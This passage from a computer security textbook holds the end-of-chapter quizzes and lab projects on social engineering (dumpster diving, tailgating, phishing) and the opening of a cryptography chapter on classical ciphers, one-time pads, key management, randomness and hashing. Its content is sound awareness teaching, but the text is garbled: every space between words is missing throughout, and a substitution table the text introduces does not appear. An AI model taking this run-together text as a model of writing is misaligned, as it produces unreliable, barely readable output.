Onecommonwaytofindusefulinformation(iftheattackerisinthevicinityofthetarget,suchasacompanyoffice)istogothroughthetarget’strashlookingforbitsofinformationthatcouldbeusefultoapenetrationattempt.
Determinewaysinwhichuserscanaidinsteadofdetractfromsecurity
Aninterestingparadoxofsocialengineeringattacksisthatpeoplearenotonlythebiggestproblemandsecurityriskbutalsothebestlineofdefenseagainstasocialengineeringattack.
Asignificantportionofemployee-createdsecurityproblemsarisefrompoorsecuritypractices.
Usersshouldalwaysbeonthewatchforattemptsbyindividualstogaininformationabouttheorganizationandshouldreportsuspiciousactivitytotheiremployer.
Recognizetheroletrainingandawarenessplaysinassistingthepeoplesideofsecurity
Individualuserscanenhancesecurityofasystemthroughproperexecutionoftheirindividualactionsandresponsibilities.
Trainingandawarenessprogramscanreinforceuserknowledgeof
desiredactions.
KeyTermsbackdoor(82)dumpsterdiving(81)phishing(75)piggybacking(80)reversesocialengineering(77)shouldersurfing(76)socialengineering(73)SPAM(76)tailgating(80)vishing(76)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.A_______________isanavenuethatcanbeusedtoaccessasystemwhilecircumventingnormalsecuritymechanisms.
2._______________isaprocedureinwhichattackerspositionthemselvesinsuchawayastobeabletoobserveanauthorizeduserenteringthecorrectaccesscode.
3.Theprocessofgoingthroughatarget’strashsearchingforinformationthatcanbeusedinanattack,ortogainknowledgeaboutasystemornetwork,isknownas_______________.
4._______________isthesimpletacticoffollowingcloselybehindapersonwhohasjustusedtheiraccesscardorPINtogainphysicalaccesstoaroomorbuilding.
5.In_______________,theattackerhopestoconvincethetargettoinitiatecontact.
6._______________isavariationof_______________thatusesvoicecommunicationtechnologytoobtaintheinformationtheattackerisseeking.
Multiple-ChoiceQuiz1.Whichofthefollowingisconsideredagoodpracticeforpassword
security?
A.Usingacombinationofupper-andlowercasecharacters,anumber,andaspecialcharacterinthepassworditself
B.Notwritingthepassworddown
C.Changingthepasswordonaregularbasis
D.Alloftheabove
2.Thepassworddilemmareferstothefactthat:A.Passwordsthatareeasyforuserstorememberarealsoeasyfor
attackerstoguess.
B.Themoredifficultwemakeitforattackerstoguessourpasswords,andthemorefrequentlyweforcepasswordchanges,themoredifficultthepasswordsareforauthorizeduserstorememberandthemorelikelytheyaretowritethemdown.
C.Userswillinvariablyattempttoselectpasswordsthatarewordstheycanremember.Thismeanstheymayselectthingscloselyassociatedwiththem,suchastheirspouse’sorchild’sname,abelovedsportsteam,orafavoritemodelofcar.
D.Passwordsassignedbyadministratorsareusuallybetterand
moresecure,butareoftenharderforuserstoremember.
3.ThesimpletacticoffollowingcloselybehindapersonwhohasjustusedtheirownaccesscardorPINtogainphysicalaccesstoaroomorbuildingiscalled:
A.Shouldersurfing
B.Tagging-along
C.Piggybacking
D.Accessdrafting
4.Theprocessofgoingthroughatarget’strashinhopesoffindingvaluableinformationthatmightbeusedinapenetrationattemptisknownas:
A.Dumpsterdiving
B.Trashtrolling
C.Garbagegathering
D.Refuserolling
5.Whichofthefollowingisatypeofsocialengineeringattackinwhichanattackerattemptstoobtainsensitiveinformationfromauserbymasqueradingasatrustedentityinane-mail?
A.SPAM
B.SPIM
C.Phishing
D.Vishing
6.Reversesocialengineeringinvolves:A.Contactingthetarget,elicitingsomesensitiveinformation,and
convincingthemthatnothingoutoftheordinaryhasoccurred
B.Contactingthetargetinanattempttoobtaininformationthatcanbeusedinasecondattemptwithadifferentindividual
C.Anindividuallowerinthechainofcommandconvincingsomebodyatahigherleveltodivulgeinformationthattheattackerisnotauthorizedtohave
D.Anattackerattemptingtosomehowconvincethetargettoinitiatecontactinordertoavoidquestionsaboutauthenticity
7.Thereasonfornotallowinguserstoinstallnewhardwareorsoftwarewithouttheknowledgeofsecurityadministratorsis:
A.Theymaynotcompletetheinstallationcorrectlyandtheadministratorwillhavetodomorework,takingthemawayfrommoreimportantsecuritytasks.
B.Theymayinadvertentlyinstallmorethanjustthehardwareorsoftware;theymayaccidentallyinstallabackdoorintothenetwork.
C.Theymaynothavepaidforitandthusmaybeexposingtheorganizationtocivilpenalties.
D.Unauthorizedhardwareandsoftwareareusuallyforleisurepurposesandwilldistractemployeesfromthejobtheywerehiredtoperform.
8.Onceanorganization’ssecuritypolicieshavebeenestablished,thesinglemosteffectivemethodofcounteringpotentialsocialengineeringattacksis:
A.Anactivesecurityawarenessprogram
B.Aseparatephysicalaccesscontrolmechanismforeachdepartmentintheorganization
C.Frequenttestingofboththeorganization’sphysicalsecurityproceduresandemployeetelephonepractices
D.Implementingaccesscontrolcardsandthewearingofsecurityidentificationbadges
9.Whichofthefollowingtypesofattacksutilizesinstantmessagingservices?
A.SPAM
B.SPIM
C.Phishing
D.Vishing
10.InwhatwayarePINssimilartopasswords?A.UserswillnormallypickaPINthatiseasytoremember,such
asadateorspecificpattern.
B.AttackersknowcommonPINsandwilltrytousethemorwillattempttolearnmoreabouttheuserinordertomakeaneducatedguessastowhattheirPINmightbe.
C.Usersmaywritethemdowntorememberthem.
D.Alloftheabovearetrue.
EssayQuiz1.Explainthedifferencebetweensocialengineeringandreversesocial
engineering.
2.Discusshowasecurity-relatedhoaxmightbecomeasecurityissue.3.Howmightshouldersurfingbeathreatinyourschoolorwork
environment?Whatcanbedonetomakethissortofactivitymoredifficult?
4.Foranenvironmentfamiliartoyou(suchasworkorschool),describethedifferentnon-employeeswhomayhaveaccessto
facilitiesthatcouldcontainsensitiveinformation.
5.Describesomeoftheusersecurityresponsibilitiesthatyoufeelaremostimportantforuserstoremember.
LabProjects
•LabProject4.1Ifpossibleateitheryourplaceofemploymentoryourschool,attempttodeterminehoweasyitwouldbetoperformdumpsterdivingtogainaccesstoinformationatthesite.Aretrashreceptacleseasytogainaccessto?Aredocumentsshreddedbeforebeingdiscarded?Areareaswheretrashisstoredeasilyaccessible?
•LabProject4.2PerformasearchontheWebforarticlesandstoriesaboutsocialengineeringattacksorreversesocialengineeringattacks.Chooseandreadfiveorsixarticles.Howmanyoftheattacksweresuccessful?Howmanyfailedandwhy?Howcouldthosethatmayhaveinitiallysucceededbeenprevented?
•LabProject4.3SimilartoLabProject4.2,performasearchontheWebforarticlesandstoriesaboutphishingattacks.Chooseandreadfiveorsixarticles.Howmanyoftheattacksweresuccessful?Howmanyfailedandwhy?Howmightthesuccessfulattackshavebeenmitigatedorsuccessfullyaccomplished?
chapter5 Cryptography
Ifyouaredesigningcryptosystems,you’vegottothinkaboutlong-termapplications.You’vegottotrytofigureouthowtobuildsomethingthatissecureagainsttechnologyinthenextcentury
C
thatyoucannotevenimagine.
—WHITFIELDDIFFIE
Inthischapter,youwilllearnhowto
Understandthefundamentalsofcryptography
Identifyanddescribethethreetypesofcryptography
Listanddescribecurrentcryptographicalgorithms
Explainhowcryptographyisappliedforsecurity
ryptographyisthescienceofencrypting,orhiding,information—somethingpeoplehavesoughttodosincetheybeganusinglanguage.Althoughlanguageallowedpeopletocommunicatewithoneanother,
thoseinpowerattemptedtohideinformationbycontrollingwhowastaughttoreadandwrite.Eventually,morecomplicatedmethodsofconcealinginformationbyshiftinglettersaroundtomakethetextunreadableweredeveloped.Thesecomplicatedmethodsarecryptographicalgorithms,alsoknownasciphers.ThewordciphercomesfromtheArabicwordsifr,meaningemptyorzero.Whenmaterial,calledplaintext,needstobeprotectedfrom
unauthorizedinterceptionoralteration,itisencryptedintociphertext.Thisisdoneusinganalgorithmandakey,andtheriseofdigitalcomputershasprovidedawidearrayofalgorithmsandincreasinglycomplexkeys.Thechoiceofspecificalgorithmdependsonseveralfactors,andtheywillbeexaminedinthischapter.Cryptanalysis,theprocessofanalyzingavailableinformationinan
attempttoreturntheencryptedmessagetoitsoriginalform,requiredadvancesincomputertechnologyforcomplexencryptionmethods.Thebirthofthecomputermadeitpossibletoeasilyexecutethecalculationsrequiredbymorecomplexencryptionalgorithms.Today,thecomputeralmostexclusivelypowershowencryptionisperformed.Computertechnologyhasalsoaidedcryptanalysis,allowingnewmethodstobe
developed,suchaslinearanddifferentialcryptanalysis.Differentialcryptanalysisisdonebycomparingtheinputplaintexttotheoutputciphertexttotryanddeterminethekeyusedtoencrypttheinformation.Linearcryptanalysisissimilarinthatitusesbothplaintextandciphertext,butitputstheplaintextthroughasimplifiedciphertotryanddeducewhatthekeyislikelytobeinthefullversionofthecipher.
CryptographyinPracticeWhilecryptographymaybeascience,itperformscriticalfunctionsintheenablingoftrustacrosscomputernetworksinbusinessandotherfunctions.Beforewedigdeepintothetechnicalnatureofcryptographicpractices,anoverviewofcurrentcapabilitiesisuseful.Examiningcryptographyfromahighlevel,thereareseveralrelevantpointstoday.Cryptographyhasbeenalong-runningeventofadvancesbothonthe
sideofcryptographyandthesideofbreakingitviaanalysis.Withtheadventofdigitalcryptography,theadvantagehasclearlyswungtothesideofcryptography.Moderncomputershavealsoincreasedtheneedfor,andloweredthecostofemploying,cryptographytosecureinformation.Inthepast,theeffectivenessrestedinthesecrecyofthealgorithm,butwithmoderndigitalcryptography,thestrengthisbasedonsheercomplexity.Thepowerofnetworksandmodernalgorithmshasalsobeenemployedtomanageautomatickeymanagement.
Cryptographyismuchmorethanencryption.Cryptographicmethodsenabledataprotection,datahiding,integritychecks,nonrepudiationservices,policyenforcement,keymanagementandexchange,andmanymoreelementsusedinmoderncomputing.IfyouusedtheWebtoday,oddsareyouusedcryptographywithoutevenknowingit.
Cryptographyhasmanyusesbesidesjustenablingconfidentialityincommunicationchannels.Cryptographicfunctionsareusedinawide
rangeofapplications,including,butnotlimitedto,hidingdata,resistingforgery,resistingunauthorizedchange,resistingrepudiation,policyenforcement,andkeyexchanges.Inspiteofthestrengthsofmoderncryptography,itstillfailsduetootherissues;knownplaintextattacks,poorlyprotectedkeys,andrepeatedpassphrasesareexamplesofhowstrongcryptographyisrenderedweakviaimplementationmistakes.Moderncryptographicalgorithmsarefarstrongerthanneededgiventhe
stateofcryptanalysis.Theweaknessesincryptosystemscomefromthesystemsurroundingthealgorithm,implementation,andoperationalizationdetails.AdiShamir,theSinRSA,statesitclearly:“Attackersdonotbreakcrypto;theybypassit.”Overtime,weaknessesanderrors,aswellasshortcuts,arefoundin
algorithms.Whenanalgorithmisreportedasbroken,theterm“broken”canhavemanymeanings.Thiscouldmeanthatthealgorithmisofnofurtheruse,oritcouldmeanthatithasweaknessesthatmaysomedaybeemployedtobreakit,oranythingbetweentheseextremes.Asallmethodscanbebrokenwithbruteforce,onequestionishowmucheffortisrequired,atwhatcost,whencomparedtothevalueoftheassetunderprotection.Whenexaminingthestrengthofacryptosystem,itisworthexamining
thefollowingtypesoflevelsofprotection:
1.Themechanismisnolongerusefulforanypurpose.2.Thecostofrecoveringthecleartextwithoutbenefitofthekeyhasfallentoalowlevel.
3.Thecosthasfallentoequaltoorlessthanthevalueofthedataorthenextleastcostattack.
4.Thecosthasfallentowithinseveralordersofmagnitudesofthecostofencryptionorthevalueofthedata.
5.Theelapsedtimeofattackhasfallentowithinmagnitudesofthelifeofthedata,regardlessofthecostthereof.
6.Thecosthasfallentolessthanthecostofabrute-forceattackagainstthekey.
7.Someonehasrecoveredonekeyoronemessage.
Thislistofconditionsisadescendinglistofrisks/benefits.Conditions6and7areregularoccurrencesincryptographicsystems,andgenerallynotworthworryingaboutatall.Infact,itisnotuntilthefourthpointthatonehastohaverealconcerns.Withallthissaid,mostorganizationsconsiderreplacementbetween5and6.Ifanyofthefirstthreearepositive,theorganizationseriouslyneedstoconsiderchangingtheircryptographicmethods.
FundamentalMethodsModerncryptographicoperationsareperformedusingbothanalgorithmandakey.Thechoiceofalgorithmdependsonthetypeofcryptographicoperationthatisdesired.Thesubsequentchoiceofkeyisthentiedtothespecificalgorithm.Cryptographicoperationsincludeencryption(fortheprotectionofconfidentiality),hashing(fortheprotectionofintegrity),digitalsignatures(tomanagenonrepudiation),andabevyofspecialtyoperationssuchaskeyexchanges.Themethodsusedtoencryptinformationarebasedontwoseparate
operations,substitutionandtransposition.Substitutionisthereplacementofanitemwithadifferentitem.Transpositionisthechangingoftheorderofitems.PigLatin,achild’scipher,employsbothoperationsinsimplisticformandisthuseasytodecipher.Theseoperationscanbedoneonwords,characters,and,inthedigitalworld,bits.Whatmakesasystemsecureisthecomplexityofthechangesemployed.Tomakeasystemreversible(soyoucanreliablydecryptit),thereneedstobeabasisforthepatternofchanges.Historicalciphersusedrelativelysimplepatterns,andonesthatrequiredsignificantknowledge(atthetime)tobreak.Moderncryptographyisbuiltaroundcomplexmathematicalfunctions.
Thesefunctionshavespecificpropertiesthatmakethemresistantto
reversingorsolvingbymeansotherthantheapplicationofthealgorithmandkey.
Assuranceisaspecificterminsecuritythatmeansthatsomethingisnotonlytruebutcanbeproventobesotosomespecificlevelofcertainty.
Whilethemathematicalspecificsoftheseoperationscanbeverycomplexandarebeyondthescopeofthislevelofmaterial,theknowledgetoproperlyemploythemisnot.Cryptographicoperationsarecharacterizedbythequantityandtypeofdata,aswellasthelevelandtypeofprotectionsought.Integrityprotectionoperationsarecharacterizedbythelevelofassurancedesired.Datacanbecharacterizedbyitsstate:dataintransit,dataatrest,ordatainuse.Itisalsocharacterizedinhowitisused,eitherinblockformorstreamform.
ComparativeStrengthsandPerformanceofAlgorithmsThereareseveralfactorsthatplayaroleindeterminingthestrengthofacryptographicalgorithm.Firstandmostobviousisthesizeofthekeyandtheresultingkeyspace.Thekeyspaceisdefinedasasetofeverypossiblekeyvalue.Onemethodofattackistosimplytryallofthepossiblekeysinabrute-forceattack.Theotherfactorisreferredtoasworkfactor,whichisasubjectivemeasurementofthetimeandeffortneededtoperformoperations.Iftheworkfactorislow,thentherateatwhichkeyscanbetestedishigh,meaningthatlargerkeyspacesareneeded.Workfactoralsoplaysaroleinprotectingsystemssuchaspasswordhashes,wherehavingahigherworkfactorcanbepartofthesecuritymechanism.
TechTip
KeyspaceComparisonsBecausethekeyspaceisanumericvalue,itisveryimportanttoensurethatcomparisonsaredoneusingsimilarkeytypes.Comparingakeymadeof1bit(2possiblevalues)andakeymadeof1letter(26possiblevalues)wouldnotyieldaccurateresults.Fortunately,thewidespreaduseofcomputershasmadealmostallalgorithmsstatetheirkeyspacevaluesintermsofbits.
Alargerkeyspaceallowstheuseofkeysofgreatercomplexity,andthereforemoresecurity,assumingthealgorithmiswelldesigned.Itiseasytoseehowkeycomplexityaffectsanalgorithmwhenyoulookatsomeoftheencryptionalgorithmsthathavebeenbroken.TheDataEncryptionStandard(DES)usesa56-bitkey,allowing72,000,000,000,000,000possiblevalues,butithasbeenbrokenbymoderncomputers.ThemodernimplementationofDES,TripleDES(3DES),usesthree56-bitkeys,foratotalkeylengthof168bits(althoughfortechnicalreasonstheeffectivekeylengthis112bits),or340,000,000,000,000,000,000,000,000,000,000,000,000possiblevalues.Whenanalgorithmlistsacertainnumberofbitsasakey,itisdefining
thekeyspace.Somealgorithmshavekeylengthsof8192bitsormore,resultinginverylargekeyspaces,evenbydigitalcomputerstandards.Moderncomputershavealsochallengedworkfactorelementsas
algorithmscanberenderedveryquicklybyspecializedhardwaresuchashigh-endgraphicchips.Todefeatthis,manyalgorithmshaverepeatedcyclestoaddtotheworkandreducetheabilitytoparallelizeoperationsinsideprocessorchips.Thisisdonetoincreasetheinefficiencyofacalculation,butinamannerthatstillresultsinsuitableperformancewhengiventhekeyandstillcomplicatesmatterswhendoneinabrute-forcemannerwithallkeys.
HistoricalPerspectives
Cryptographyisasoldassecrets.Humanshavebeendesigningsecretcommunicationsystemsforaslongthey’veneededtokeepcommunicationprivate.TheSpartansofancientGreecewouldwriteonaribbonwrappedaroundacylinderwithaspecificdiameter(calledascytale).Whentheribbonwasunwrapped,itrevealedastrangestringofletters.Themessagecouldbereadonlywhentheribbonwaswrappedaroundthesamediametercylinder.Thisisanexampleofatranspositioncipher,wherethesamelettersareusedbuttheorderischanged.Inalltheseciphersystems,theunencryptedinputtextisknownasplaintextandtheencryptedoutputisknownasciphertext.
SubstitutionCiphersTheRomanstypicallyusedadifferentmethodknownasashiftcipher.Inthiscase,oneletterofthealphabetisshiftedasetnumberofplacesinthealphabetforanotherletter.Acommonmodern-dayexampleofthisistheROT13cipher,inwhicheveryletterisrotated13positionsinthealphabet:niswritteninsteadofa,oinsteadofb,andsoon.Thesetypesofciphersarecommonlyencodedonanalphabetwheel,asshowninFigure5.1.
•Figure5.1Anyshiftciphercaneasilybeencodedanddecodedonawheeloftwopiecesofpaperwiththealphabetsetasaring;bymovingonecirclethespecifiednumberintheshift,youcantranslatethecharacters.
Theseciphersweresimpletouseandalsosimpletobreak.Becausehidinginformationwasstillimportant,moreadvancedtranspositionandsubstitutioncipherswererequired.Assystemsandtechnologybecamemorecomplex,cipherswerefrequentlyautomatedbysomemechanicalorelectromechanicaldevice.AfamousexampleofarelativelymodernencryptionmachineistheGermanEnigmamachinefromWorldWarII(seeFigure5.2).Thismachineusedacomplexseriesofsubstitutionstoperformencryption,andinterestinglyenoughitgaverisetoextensiveresearchincomputers.
•Figure5.2OneofthesurvivingGermanEnigmamachines
Caesar’scipherusesanalgorithmandakey:thealgorithmspecifiesthatyouoffsetthealphabeteithertotheright(forward)ortotheleft(backward),andthekeyspecifieshowmanyletterstheoffsetshouldbe.Forexample,ifthealgorithmspecifiesoffsettingthealphabettotheright,
andthekeyis3,theciphersubstitutesanalphabeticletterthreetotherightfortherealletter,sodisusedtorepresenta,frepresentsc,andsoon.Inthisexample,boththealgorithmandkeyaresimple,allowingforeasycryptanalysisofthecipherandeasyrecoveryoftheplaintextmessage.Theeasewithwhichshiftcipherswerebrokenledtothedevelopmentof
substitutionciphers,whichwerepopularinElizabethanEngland(roughlythesecondhalfofthe16thcentury)andmorecomplexthanshiftciphers.Substitutionciphersworkontheprincipleofsubstitutingadifferentletterforeveryletter:abecomesg,bbecomesd,andsoon.Thissystempermits26possiblevaluesforeveryletterinthemessage,makingtheciphermanytimesmorecomplexthanastandardshiftcipher.Simpleanalysisoftheciphercouldbeperformedtoretrievethekey,however.Bylookingforcommonletterssuchaseandpatternsfoundinwordssuchasing,youcandeterminewhichcipherlettercorrespondstowhichplaintextletter.Theexaminationofciphertextforfrequentlettersisknownasfrequencyanalysis.Makingeducatedguessesaboutwordswilleventuallyallowyoutodeterminethesystem’skeyvalue(seeFigure5.3).
•Figure5.3Makingeducatedguessesismuchlikeplayinghangman—correctguessescanleadtomoreorallofthekeybeingrevealed.
Tocorrectthisproblem,morecomplexityhadtobeaddedtothesystem.TheVigenèrecipherworksasapolyalphabeticsubstitutioncipherthatdependsonapassword.Thisisdonebysettingupasubstitutiontablelikethisone:
Thenthepasswordismatcheduptothetextitismeanttoencipher.Ifthepasswordisnotlongenough,thepasswordisrepeateduntilonecharacterofthepasswordismatchedupwitheachcharacteroftheplaintext.Forexample,iftheplaintextisSampleMessageandthepasswordispassword,theresultingmatchis
SAMPLEMESSAGEPASSWORDPASSW
Thecipherletterisdeterminedbyuseofthegrid,matchingtheplaintextcharacter’srowwiththepasswordcharacter’scolumn,resultinginasingleciphertextcharacterwherethetwomeet.ConsiderthefirstlettersSandP:whenpluggedintothegridtheyoutputaciphertextcharacterofH.Thisprocessisrepeatedforeveryletterofthemessage.Oncetherestofthelettersareprocessed,theoutputisHAEHHSDHHSSYA.Inthisexample,thekeyintheencryptionsystemisthepassword.The
examplealsoillustratesthatanalgorithmcanbesimpleandstillprovide
strongsecurity.Ifsomeoneknowsaboutthetable,theycandeterminehowtheencryptionwasperformed,buttheystillwillnotknowthekeytodecryptingthemessage.Themorecomplexthekey,thegreaterthesecurityofthesystem.The
Vigenèreciphersystemandsystemslikeitmakethealgorithmsrathersimplebutthekeyrathercomplex,withthebestkeyscomprisingverylongandveryrandomdata.Keycomplexityisachievedbygivingthekeyalargenumberofpossiblevalues.
TryThis!VigenèreCipherMakeasimplemessagethat’sabouttwosentenceslong,andthenchoosetwopasswords,onethat’sshortandonethat’slong.Then,usingthesubstitutiontablepresentedinthissection,performsimpleencryptiononthemessage.Comparethetwociphertexts;sinceyouhavetheplaintextandtheciphertext,youshouldbeabletoseeapatternofmatchingcharacters.Knowingthealgorithmused,seeifyoucandeterminethekeyusedtoencryptthemessage.
One-timePadsOne-timepadsareaninterestingformofencryptioninthattheytheoreticallyareperfectandunbreakable.Thekeyisthesamesizeorlargerthanthematerialbeingencrypted.TheplaintextisXOR’edagainstthekeyproducingtheciphertext.Whatmakestheone-timepad“perfect”isthesizeofthekey.Ifyouuseakeyspacefullofkeys,youwilldecrypteverypossiblemessageofthesamelengthastheoriginal,withnowaytodiscriminatewhichoneiscorrect.Thismakesaone-timepadunabletobebrokenbyevenbrute-forcemethods,providedthatthekeyisnotreused.Thismakesaone-timepadlessthanpracticalforanymassuse.
One-timepadsareexamplesofperfectciphersfromamathematicalpointofview.Butwhenput
intopractice,theimplementationcreatesweaknessesthatresultinlessthanperfectsecurity.Thisisanimportantreminderthatperfectciphersfromamathematicalpointofviewdonotcreateperfectsecurityinpracticebecauseofthelimitationsassociatedwithimplementation.
AlgorithmsEverycurrentencryptionschemeisbaseduponanalgorithm,astep-by-step,recursivecomputationalprocedureforsolvingaprobleminafinitenumberofsteps.Thecryptographicalgorithm—whatiscommonlycalledtheencryptionalgorithmorcipher—ismadeupofmathematicalstepsforencryptinganddecryptinginformation.Thefollowingillustrationshowsadiagramoftheencryptionanddecryptionprocessanditsparts.Therearethreetypesofencryptionalgorithmscommonlyused:hashing,symmetric,andasymmetric.Hashingisaveryspecialtypeofencryptionalgorithmthattakesaninputandmathematicallyreducesittoauniquenumberknownasahash,whichisnotreversible.Symmetricalgorithmsarealsoknownassharedsecretalgorithms,asthesamekeyisusedforencryptionanddecryption.Finally,asymmetricalgorithmsuseaverydifferentprocessemployingtwokeys,apublickeyandaprivatekey,makingupwhatisknownasakeypair.
Thebestalgorithmsarealwayspublicalgorithmsthathavebeenpublishedforpeerreviewbyothercryptographicandmathematicalexperts.Publicationisimportant,asanyflawsinthesystemcanbe
revealedbyothersbeforeactualuseofthesystem.Thisprocessgreatlyencouragestheuseofproventechnologies.Severalproprietaryalgorithmshavebeenreverse-engineered,exposingtheconfidentialdatathealgorithmstrytoprotect.ExamplesofthisincludethedecryptionofNikon’sproprietaryRAWformat,white-balanceencryption,andthecrackingoftheExxonMobilSpeedpassRFIDencryption.Theuseofaproprietarysystemcanactuallybelesssecurethanusingapublishedsystem.Whereasproprietarysystemsarenotmadeavailabletobetestedbypotentialcrackers,publicsystemsaremadepublicforpreciselythispurpose.
Oneofthemostcommoncryptographicfailuresisthecreationofyourownencryptionscheme.Rollingyourowncryptography,whetherincreatingalgorithmsorimplementationofexistingalgorithmsyourself,isarecipeforfailure.Alwaysuseapprovedalgorithmsandalwaysuseapprovedcryptolibrariestoimplement.
Asystemthatmaintainsitssecurityafterpublictestingcanbereasonablytrustedtobesecure.Apublicalgorithmcanbemoresecurebecausegoodsystemsrelyontheencryptionkeytoprovidesecurity,notthealgorithmitself.Theactualstepsforencryptingdatacanbepublished,becausewithoutthekey,theprotectedinformationcannotbeaccessed(seeFigure5.4).
•Figure5.4Whileeveryoneknowshowtouseaknobtoopenadoor,withoutthekeytounlocktheknob,thatknowledgeisuseless.
Akeyisaspecialpieceofdatausedinboththeencryptionanddecryptionprocesses.Thealgorithmsstaythesameineveryimplementation,butadifferentkeyisusedforeach,whichensuresthatevenifsomeoneknowsthealgorithmyouusetoprotectyourdata,hecannotbreakyoursecurity.
TechTip
XORApopularfunctionincryptographyiseXclusiveOR(XOR),whichisabitwisefunctionappliedtodata.WhenyouapplyakeytodatausingXOR,thenasecondapplicationundoesthefirstoperation.Thismakesforspeedyencryption/decryption,butmakesthesystemtotallydependentuponthesecrecyofthekey.Ahard-codedkeyinaprogramwillbediscovered,makingthisaweaksecuritymechanisminmostcases.
Comparingthestrengthoftwodifferentalgorithmscanbemathematicallyverychallenging;fortunatelyforthelayperson,thereisaroughguide.Mostcurrentalgorithmsarelistedwiththeirkeysizeinbits.Unlessaspecificalgorithmhasbeenshowntobeflawed,ingeneral,thegreaternumberofbitswillyieldamoresecuresystem.Thisworkswellforagivenalgorithm,butismeaninglesstocomparedifferentalgorithms.Thegoodnewsisthatmostmoderncryptographyismorethanstrongenoughforallbuttechnicaluses,andforthoseusesexpertscandetermineappropriatealgorithmsandkeylengthstoprovidethenecessaryprotections.
TechTip
Man-in-the-MiddleAttackAman-in-the-middleattackisdesignedtodefeatproperkeyexchangebyinterceptingtheremoteparty’skeyandreplacingitwiththeattacker’skeyinbothdirections.Ifdoneproperly,onlytheattackerknowsthattheencryptedtrafficisnotsecureandtheencryptedtrafficcanbereadbytheattacker.
KeyManagementBecausethesecurityofthealgorithmsreliesonthekey,keymanagementisofcriticalconcern.Keymanagementincludesanythinghavingtodowiththeexchange,storage,safeguarding,andrevocationofkeys.Itismostcommonlyassociatedwithasymmetricencryption,sinceasymmetricencryptionusesbothpublicandprivatekeys.Tobeusedproperlyfor
authentication,akeymustbecurrentandverified.Ifyouhaveanoldorcompromisedkey,youneedawaytochecktoseethatthekeyhasbeenrevoked.Keymanagementisalsoimportantforsymmetricencryption,because
symmetricencryptionreliesonbothpartieshavingthesamekeyforthealgorithmtowork.Sincethesepartiesareusuallyphysicallyseparate,keymanagementiscriticaltoensurekeysaresharedandexchangedeasily.Theymustalsobesecurelystoredtoprovideappropriateconfidentialityoftheencryptedinformation.Therearemanydifferentapproachestosecurestorageofkeys,suchasputtingthemonaUSBflashdriveorsmartcard.Whilekeyscanbestoredinmanydifferentways,newPChardwareoftenincludestheTrustedPlatformModule(TPM),whichprovidesahardware-basedkeystoragelocationthatisusedbymanyapplications.(MorespecificinformationaboutthemanagementofkeysisprovidedlaterinthischapterandinChapter6.)
RandomNumbersManydigitalcryptographicalgorithmshaveaneedforarandomnumbertoactasaseedandprovidetruerandomness.Oneofthestrengthsofcomputersisthattheycandoataskoverandoveragainintheexactsamemanner—nonoiseorrandomness.Thisisgreatformosttasks,butingeneratingarandomsequenceofvalues,itpresentschallenges.Softwarelibrarieshavepseudo-randomgenerators,functionsthatproduceaseriesofnumbersthatstatisticallyappearrandom.Buttheserandomnumbergeneratorsaredeterministicinthat,giventhesequence,youcancalculatefuturevalues.Thismakestheminappropriateforuseincryptographicsituations.Theleveloramountofrandomnessisreferredtoasentropy.Entropyis
themeasureofuncertaintyassociatedwithaseriesofvalues.Perfectentropyequatestocompleterandomness,suchthatgivenanystringofbits,thereisnocomputationtoimproveguessingthenextbitinthesequence.Asimple“measure”ofentropyisinbits,wherethebitsarethepowerof2
thatrepresentsthenumberofchoices.Soifthereare2048options,thenthiswouldrepresent11bitsofentropy.Inthisfashion,onecancalculatetheentropyofpasswordsandmeasurehow“hardtheyaretoguess.”
TechTip
RandomnessIssuesTheimportanceofproperrandomnumbergenerationincryptosystemscannotbeunderestimated.RecentreportsbytheGuardianandtheNewYorkTimesassertthattheU.S.NationalSecurityAgency(NSA)hasputabackdoorintotheCryptographicallySecureRandomNumberGenerator(CSPRNG)algorithmsdescribedinNISTSP800-90A,particularlytheDual_EC_DRBGalgorithm.FurtherallegationsarethattheNSApaidRSA$10milliontousetheresultingstandardinitsproductline.
Toresolvetheproblemofappropriaterandomness,therearesystemstocreatecryptographicrandomnumbers.Thelevelofcomplexityofthesystemisdependentuponthelevelofpurerandomnessneeded.Forsomefunctions,suchasmasterkeys,theonlytruesolutionisahardware-basedrandomnumbergeneratorthatcanusephysicalpropertiestoderiveentropy.Inother,lessdemandingcases,acryptographiclibrarycallcanprovidethenecessaryentropy.Whilethetheoreticalstrengthofthecryptosystemdependsonthealgorithm,thestrengthoftheimplementationinpracticecandependonissuessuchasthekey.Thisisaveryimportantissueandmistakesmadeinimplementationcaninvalidateeventhestrongestalgorithmsinpractice.
HashingFunctionsHashingfunctionsarecommonlyusedencryptionmethods.Ahashingfunctionorhashfunctionisaspecialmathematicalfunctionthatperformsaone-wayfunction,whichmeansthatoncethealgorithmisprocessed,thereisnofeasiblewaytousetheciphertexttoretrievetheplaintextthatwasusedtogenerateit.Also,ideally,thereisnofeasiblewaytogenerate
twodifferentplaintextsthatcomputetothesamehashvalue.Thehashvalueistheoutputofthehashingalgorithmforaspecificinput.Theillustrationshowstheone-waynatureofthesefunctions.
Commonusesofhashingalgorithmsaretostorecomputerpasswordsandtoensuremessageintegrity.Theideaisthathashingcanproduceauniquevaluethatcorrespondstothedataentered,butthehashvalueisalsoreproduciblebyanyoneelserunningthesamealgorithmagainstthesamedata.Soyoucouldhashamessagetogetamessageauthenticationcode(MAC),andthecomputationalnumberofthemessagewouldshowthatnointermediaryhasmodifiedthemessage.Thisprocessworksbecausehashingalgorithmsaretypicallypublic,andanyonecanhashdatausingthespecifiedalgorithm.Itiscomputationallysimpletogeneratethehash,soitissimpletocheckthevalidityorintegrityofsomethingbymatchingthegivenhashtoonethatislocallygenerated.Severalprogramscancomputehashvaluesforaninputfile,asshowninFigure5.5.Hash-basedMessageAuthenticationCode(HMAC)isaspecialsubsetofhashingtechnology.ItisahashalgorithmappliedtoamessagetomakeaMAC,butitisdonewithapreviouslysharedsecret.SotheHMACcanprovideintegritysimultaneouslywithauthentication.HMAC-MD5isusedintheNTLANManagerversion2challenge/responseprotocol.
•Figure5.5Thereareseveralprogramsavailablethatwillacceptan
inputandproduceahashvalue,lettingyouindependentlyverifytheintegrityofdownloadedcontent.
